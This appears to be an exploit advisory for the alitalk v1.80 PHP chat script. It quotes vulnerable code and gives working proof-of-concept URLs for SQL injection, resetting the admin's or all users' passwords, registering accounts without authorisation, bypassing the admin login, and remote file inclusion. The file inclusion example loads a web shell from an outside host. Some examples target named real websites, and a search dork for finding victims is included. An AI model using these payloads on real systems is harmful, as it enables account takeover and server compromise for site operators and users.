| # Title    : alitalk v.1.80 Multiple Vulnerability   
| # Author   : indoushka                                                               
| # email    : indoushka4ever@gmail.com                                                                                                                                                                 
| # Dork     : POWERED BY ALITALK
| # Tested on: windows 8.1 Français V.(Pro)        
| # Download : http://teh24h.ir/                                                   
=======================================
SQL INJECTION   :

you need to login in order to exploit this vulnerability
vulnerable code on inc/receivertwo.php
<?
.....
if($_GET['turnadd']==1)
{
$rmusr=0;
$rmmzyiz=mysql_query("SELECT * from ".$alitalk_base['dbprefix']."users where room='".$_GET['mohit']."'");
while ($rmuiz=mysql_fetch_array($rmmzyiz))
{
echo"<rmusj>";
echo" r%dtr onmouseout=\"detailsclo()\" onmouseover=\"details(event,'".$rmuiz[gender]."','".$rmuiz[age]."','".$rmuiz[username]."','".$rmuiz[location]."')\" ondblclick=\"ums('".$rmuiz[uid]."','".$rmuiz[username]."','".""."')\" b*%d
r%dtd width='19'b*%d r%dimg src=\"pix/room_user.gif\"b*%dr%d/tdb*%d
r%dtd class='roomuser'b*%dr%dfont unselectable='on' style=\"cursor: default;\"b*%d $rmuiz[username] r%d/tdb*%d
r%d/trb*%d";
$rmusr++;
echo"</rmusj>";
}
....
?>

poc:
 
http://target/path/alitalk/inc/receivertwo.php?uid=1&mohit=y'+union+select+user(),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2+from+alitalk_users+where+uid='1&turnadd=1&melody=0&lilil=400

PASSWORD CHANGE BYPASS  :

vulnerable code on functionz/usercp.php
<?
.....
function newpass($db,$id)
{
$nat=md5($_GET['old'].$_GET['old']);
$nao=md5($_GET['new'].$_GET['new']);
$threeyiz=mysql_query("SELECT * from ".$db."users where uid='".$id."' and password='".md5(md5($_GET['old']).$nat)."'");
$yiz=mysql_fetch_array($threeyiz);
if(!$yiz)
{
echo "Old Password is Wrong!";
}
else
{
mysql_query("UPDATE ".$db."users SET password='".md5(md5($_GET['new']).$nao)."' WHERE uid='".$id."'");
mysql_query("UPDATE ".$db."users SET salt='".$nao."' WHERE uid='".$id."'");
mpl($db,$id);
}
}
.....
?>
 
pocs:
 
http://target/path/inc/usercp.php?action=newpass&id=1' or password='&lilil=400&new=algeria
this will change password to "algeria" for user with uid = 1 (admin).
 
http://target/path/inc/usercp.php?action=newpass&id=1' or 1='1&lilil=400&new=algeria
this will change ALL passwords to "algeria".
http://www.taoa-tanzania.com/chat/alitalk/inc/elementz.php?lilil=400&ubild=indoushka&pa=algeria
 
USER REGISTRATION BYPASS :

vulnerable code on inc/elementz.php:
 
<?
......
if($_GET['lilil']!=="".$_SESSION['lilol'].""){return false;}
include"setting.php";
$analuze=mysql_query("SELECT username from ".$alitalk_base['dbprefix']."users where username='".$_GET['ubild']."' and type='alitalk'");
$analuzeed=mysql_fetch_array($analuze);
if($analuzeed)
{
echo "Fatal Error";
}
else
{
$nat=md5($_GET['pa'].$_GET['pa']);
$pass=md5(md5($_GET['pa']).$nat);
mysql_query("INSERT into ".$alitalk_base['dbprefix']."users (firstname,lastname,gender,age,username,password,salt,joindate,addz,type) values('".$_GET['fn']."','".$_GET['ln']."','".$_GET['gender']."','".$_GET['age']."','".$_GET['ubild']."','".$pass."','".$nat."','".date("F j, Y")."','$uid','alitalk')");
....
?>
 
poc:
 
http://target/path/inc/elementz.php?lilil=400&ubild=algeria&pa=algeria
this will add an account with username=algeria and password=algeria
 
Access Bypass :

code on admin/index.php
<?
.......
else if($_POST['signin'])
{
include "../functionz/first_process.php";
include "../inc/setting.php";
addin($_POST['username'],$_POST['password'],$alitalk_base['dbprefix']);
}
.....
?>

vulnerable code on functionz/first_process.php
<?
 ......
function addin($lamerz,$killer,$josh)
{
session_start();
$nat=md5($killer.$killer);
$analuze=mysql_query("SELECT * FROM ".$josh."info WHERE admin='".$lamerz."' AND password='".md5(md5($killer).$nat)."'");
$analuzeed=mysql_fetch_array($analuze);
if($analuzeed)
{
$_SESSION['adazsar']=1;
?>

admin login page= http://target/path/admin

poc:
ID = an_userID' or 1='1
password = whatever

L/R file inclusion : 

C:\web\www\alitalk\inc\elementd.php
require_once('lang/'.$alitalk['lang'].'/menu.php');
Line      : 31
Function  : require_once
Variables : $alitalk['lang']
poc :

http://www.nickerie.net/chat/inc/elementd.php?alitalk[lang]=http://www.dcvi.net/r57.txt

Greetz : 
jericho  http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/
Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * exploit4arab.net
---------------------------------------------------------------------------------------------------------------